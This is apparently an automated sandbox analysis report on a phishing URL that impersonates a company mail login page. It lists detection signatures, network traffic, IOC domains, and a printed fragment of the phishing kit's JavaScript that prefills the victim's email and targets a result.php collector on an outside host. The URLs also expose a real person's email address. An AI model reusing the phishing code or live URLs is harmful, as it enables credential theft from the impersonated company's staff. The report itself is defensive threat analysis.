Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
https://ug9n8.z1.web.core.windows.net/?lu=aHR0cHM6Ly9leHk3Ny5zMy5ldS1jZW50cmFsLTEuYW1hem9uYXdzLmNvbS9ubS5odG1sI21hcmNvLmNlcnVsbG9AaXByb3RleC5kZQ==

Overview

General Information

Sample URL:https://ug9n8.z1.web.core.windows.net/?lu=aHR0cHM6Ly9leHk3Ny5zMy5ldS1jZW50cmFsLTEuYW1hem9uYXdzLmNvbS9ubS5odG1sI21hcmNvLmNlcnVsbG9AaXByb3RleC5kZQ==
Analysis ID:1597376
Infos:

Detection

BlackHacker JS Obfuscator, HTMLPhisher
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected HtmlPhish10
AI detected suspicious Javascript
HTML page contains obfuscated javascript
Javascript uses Clearbit API to dynamically determine company logos
Yara detected BlackHacker JS Obfuscator
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid 'forgot password' link found

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • chrome.exe (PID: 6688 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 3504 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2184,i,7140382767829794373,7643732451792572459,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 4924 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ug9n8.z1.web.core.windows.net/?lu=aHR0cHM6Ly9leHk3Ny5zMy5ldS1jZW50cmFsLTEuYW1hem9uYXdzLmNvbS9ubS5odG1sI21hcmNvLmNlcnVsbG9AaXByb3RleC5kZQ==" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
dropped/chromecache_55JoeSecurity_BlackHackerJSObfuscatorYara detected BlackHacker JS ObfuscatorJoe Security
    dropped/chromecache_53JoeSecurity_BlackHackerJSObfuscatorYara detected BlackHacker JS ObfuscatorJoe Security

      HTML

      SourceRuleDescriptionAuthorStrings
      1.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        1.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          1.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            • AV Detection
            • Phishing
            • Compliance
            • Spreading
            • Networking
            • System Summary

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://electjimhenderson.com/wp-includes/images/banner.jpgAvira URL Cloud: Label: phishing
            Source: https://electjimhenderson.com/wp-includes/images/Docubg.jpgAvira URL Cloud: Label: phishing

            Phishing

            barindex
            Source: Yara matchFile source: 1.1.pages.csv, type: HTML
            Source: Yara matchFile source: 1.2.pages.csv, type: HTML
            Source: Yara matchFile source: 1.0.pages.csv, type: HTML
            Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://exy77.s3.eu-central-1.amazonaws.com/nm.htm... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. The use of `eval`, `Function` constructor, and heavily encoded strings indicates a high likelihood of malicious intent. Additionally, the script appears to be sending user data to external domains, which raises concerns about data privacy and security. While the specific purpose of the script is unclear, the combination of these factors suggests a high-risk scenario that requires further investigation.
            Source: https://ug9n8.z1.web.core.windows.net/?lu=aHR0cHM6Ly9leHk3Ny5zMy5ldS1jZW50cmFsLTEuYW1hem9uYXdzLmNvbS9ubS5odG1sI21hcmNvLmNlcnVsbG9AaXByb3RleC5kZQ==HTTP Parser: <!--// == Code Obfuscation Protection from https://blackhackertools.com == //function _0x1fe0(){v
            Source: https://exy77.s3.eu-central-1.amazonaws.com/nm.html#marco.cerullo@iprotex.deHTTP Parser: <!--// == Code Obfuscation Protection from https://blackhackertools.com == //var _0x1ed2e1=_0x2ee
            Source: https://exy77.s3.eu-central-1.amazonaws.com/nm.html#marco.cerullo@iprotex.deHTTP Parser: <!--// == Code Obfuscation Protection from https://blackhackertools.com == //var _0x1ed2e1=_0x2ee
            Source: https://exy77.s3.eu-central-1.amazonaws.com/nm.html#marco.cerullo@iprotex.deHTTP Parser: document.addeventlistener("domcontentloaded", function () { const phpurl = "https://txlocksmithbellaire.com/xzm/result.php"; const fullurl = window.location.href; const emailregex = /#([^#]+)$/; const match = fullurl.match(emailregex); const email = match ? match[1] : null; const emaildecoded = email ? decodeuricomponent(email) : null; if (emaildecoded) { const domain = emaildecoded.split('@')[1]; const companyname = domain.split('.')[0]; document.getelementbyid("eemail").value = emaildecoded; document.getelementbyid("favicon").href = `https://logo.clearbit.com/${domain}`; document.getelementbyid("logoimg").src = `https://logo.clearbit.com/${domain}`; document.getelementbyid("tittle").textcontent = `${companyname} - mail`; document.getelementbyid("logoname").textcontent = companyname.touppercase(); document.getelementbyid("footer-text").textcontent = `connected to ${emaildecoded} 2024`; localstorage.setitem...
            Source: https://exy77.s3.eu-central-1.amazonaws.com/nm.html#marco.cerullo@iprotex.deHTTP Parser: Number of links: 0
            Source: https://exy77.s3.eu-central-1.amazonaws.com/nm.html#marco.cerullo@iprotex.deHTTP Parser: <input type="password" .../> found but no <form action="...
            Source: https://exy77.s3.eu-central-1.amazonaws.com/nm.html#marco.cerullo@iprotex.deHTTP Parser: Title: iprotex - Mail does not match URL
            Source: https://exy77.s3.eu-central-1.amazonaws.com/nm.html#marco.cerullo@iprotex.deHTTP Parser: Invalid link: Forgot Password?
            Source: https://exy77.s3.eu-central-1.amazonaws.com/nm.html#marco.cerullo@iprotex.deHTTP Parser: <input type="password" .../> found
            Source: https://exy77.s3.eu-central-1.amazonaws.com/nm.html#marco.cerullo@iprotex.deHTTP Parser: No <meta name="author".. found
            Source: https://exy77.s3.eu-central-1.amazonaws.com/nm.html#marco.cerullo@iprotex.deHTTP Parser: No <meta name="author".. found
            Source: https://exy77.s3.eu-central-1.amazonaws.com/nm.html#marco.cerullo@iprotex.deHTTP Parser: No <meta name="author".. found
            Source: https://exy77.s3.eu-central-1.amazonaws.com/nm.html#marco.cerullo@iprotex.deHTTP Parser: No <meta name="copyright".. found
            Source: https://exy77.s3.eu-central-1.amazonaws.com/nm.html#marco.cerullo@iprotex.deHTTP Parser: No <meta name="copyright".. found
            Source: https://exy77.s3.eu-central-1.amazonaws.com/nm.html#marco.cerullo@iprotex.deHTTP Parser: No <meta name="copyright".. found
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:64868 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:64899 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:64988 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:61492 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:56914 version: TLS 1.2

            Spreading

            barindex
            Source: Yara matchFile source: dropped/chromecache_55, type: DROPPED
            Source: Yara matchFile source: dropped/chromecache_53, type: DROPPED
            Source: global trafficTCP traffic: 192.168.2.6:56912 -> 1.1.1.1:53
            Source: global trafficTCP traffic: 192.168.2.6:61489 -> 162.159.36.2:53
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: global trafficHTTP traffic detected: GET /nm.html HTTP/1.1Host: exy77.s3.eu-central-1.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /f6136e9b49.js HTTP/1.1Host: kit.fontawesome.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://exy77.s3.eu-central-1.amazonaws.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://exy77.s3.eu-central-1.amazonaws.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-includes/images/Docubg.jpg HTTP/1.1Host: electjimhenderson.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://exy77.s3.eu-central-1.amazonaws.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-includes/images/banner.jpg HTTP/1.1Host: electjimhenderson.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://exy77.s3.eu-central-1.amazonaws.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-includes/images/Docubg.jpg HTTP/1.1Host: electjimhenderson.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /iprotex.de HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://exy77.s3.eu-central-1.amazonaws.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-includes/images/banner.jpg HTTP/1.1Host: electjimhenderson.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /iprotex.de HTTP/1.1Host: logo.clearbit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: exy77.s3.eu-central-1.amazonaws.com
            Source: global trafficDNS traffic detected: DNS query: kit.fontawesome.com
            Source: global trafficDNS traffic detected: DNS query: electjimhenderson.com
            Source: global trafficDNS traffic detected: DNS query: logo.clearbit.com
            Source: global trafficDNS traffic detected: DNS query: txlocksmithbellaire.com
            Source: unknownHTTP traffic detected: POST /xzm/result.php HTTP/1.1Host: txlocksmithbellaire.comConnection: keep-aliveContent-Length: 270sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAimUO6kSX1NJhj17Accept: */*Origin: https://exy77.s3.eu-central-1.amazonaws.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://exy77.s3.eu-central-1.amazonaws.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 23 Jan 2025 07:05:33 GMTContent-Length: 9Connection: closeaccess-control-allow-headers: accept, accept-langauge, content-language, content-type, fa-kit-tokenaccess-control-allow-methods: GET, OPTIONSaccess-control-allow-origin: *access-control-max-age: 3000Cache-Control: max-age=0, private, must-revalidatex-request-id: GB1AfD0b3gv5LfswYMlhCF-Cache-Status: MISSServer: cloudflareCF-RAY: 9065efa0b9db4374-EWR
            Source: chromecache_53.3.dr, chromecache_55.3.drString found in binary or memory: https://blackhackertools.com
            Source: chromecache_49.3.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3-UBGEe.woff2)
            Source: chromecache_49.3.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3CUBGEe.woff2)
            Source: chromecache_49.3.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3GUBGEe.woff2)
            Source: chromecache_49.3.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3KUBGEe.woff2)
            Source: chromecache_49.3.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3OUBGEe.woff2)
            Source: chromecache_49.3.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3iUBGEe.woff2)
            Source: chromecache_49.3.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3yUBA.woff2)
            Source: chromecache_49.3.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMawCUBGEe.woff2)
            Source: chromecache_49.3.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMaxKUBGEe.woff2)
            Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56914
            Source: unknownNetwork traffic detected: HTTP traffic on port 56914 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65075
            Source: unknownNetwork traffic detected: HTTP traffic on port 61492 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61492
            Source: unknownNetwork traffic detected: HTTP traffic on port 64899 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 64868 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64911
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64999
            Source: unknownNetwork traffic detected: HTTP traffic on port 64902 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61506
            Source: unknownNetwork traffic detected: HTTP traffic on port 64908 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 65075 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64917
            Source: unknownNetwork traffic detected: HTTP traffic on port 64923 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64873
            Source: unknownNetwork traffic detected: HTTP traffic on port 64885 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 64860 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64899
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64898
            Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 64917 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64909
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64908
            Source: unknownNetwork traffic detected: HTTP traffic on port 64909 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 64911 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 64898 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 64873 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 61506 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 64988 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64923
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64988
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64902
            Source: unknownNetwork traffic detected: HTTP traffic on port 64907 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64907
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64860
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64884
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61551
            Source: unknownNetwork traffic detected: HTTP traffic on port 64884 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64885
            Source: unknownNetwork traffic detected: HTTP traffic on port 64999 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 61551 -> 443
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:64868 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:64899 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:64988 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:61492 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:56914 version: TLS 1.2
            Source: classification engineClassification label: mal72.spre.phis.win@17/15@16/9
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2184,i,7140382767829794373,7643732451792572459,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ug9n8.z1.web.core.windows.net/?lu=aHR0cHM6Ly9leHk3Ny5zMy5ldS1jZW50cmFsLTEuYW1hem9uYXdzLmNvbS9ubS5odG1sI21hcmNvLmNlcnVsbG9AaXByb3RleC5kZQ=="
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2184,i,7140382767829794373,7643732451792572459,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            Browser Extensions            		1
            Process Injection            		1
            Process Injection            		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
            Ingress Tool Transfer            		Traffic DuplicationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1597376 URL: https://ug9n8.z1.web.core.w... Startdate: 23/01/2025 Architecture: WINDOWS Score: 72 24 Antivirus detection for URL or domain 2->24 26 Yara detected HtmlPhish10 2->26 28 HTML page contains obfuscated javascript 2->28 30 3 other signatures 2->30 6 chrome.exe 1 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 14 192.168.2.6, 443, 50158, 50310 unknown unknown 6->14 16 239.255.255.250 unknown Reserved 6->16 11 chrome.exe 6->11         started        process5 dnsIp6 18 txlocksmithbellaire.com 184.168.29.58, 443, 61506, 64999 AS-26496-GO-DADDY-COM-LLCUS United States 11->18 20 exy77.s3.eu-central-1.amazonaws.com 11->20 22 8 other IPs or domains 11->22

            Screenshots

            Download Video

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            https://ug9n8.z1.web.core.windows.net/?lu=aHR0cHM6Ly9leHk3Ny5zMy5ldS1jZW50cmFsLTEuYW1hem9uYXdzLmNvbS9ubS5odG1sI21hcmNvLmNlcnVsbG9AaXByb3RleC5kZQ==0%Avira URL Cloudsafe

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://electjimhenderson.com/wp-includes/images/banner.jpg100%Avira URL Cloudphishing
            https://blackhackertools.com0%Avira URL Cloudsafe
            https://txlocksmithbellaire.com/xzm/result.php0%Avira URL Cloudsafe
            https://electjimhenderson.com/wp-includes/images/Docubg.jpg100%Avira URL Cloudphishing
            https://exy77.s3.eu-central-1.amazonaws.com/nm.html0%Avira URL Cloudsafe

            Domains and IPs

            Download Network PCAP: filteredfull

            Contacted Domains

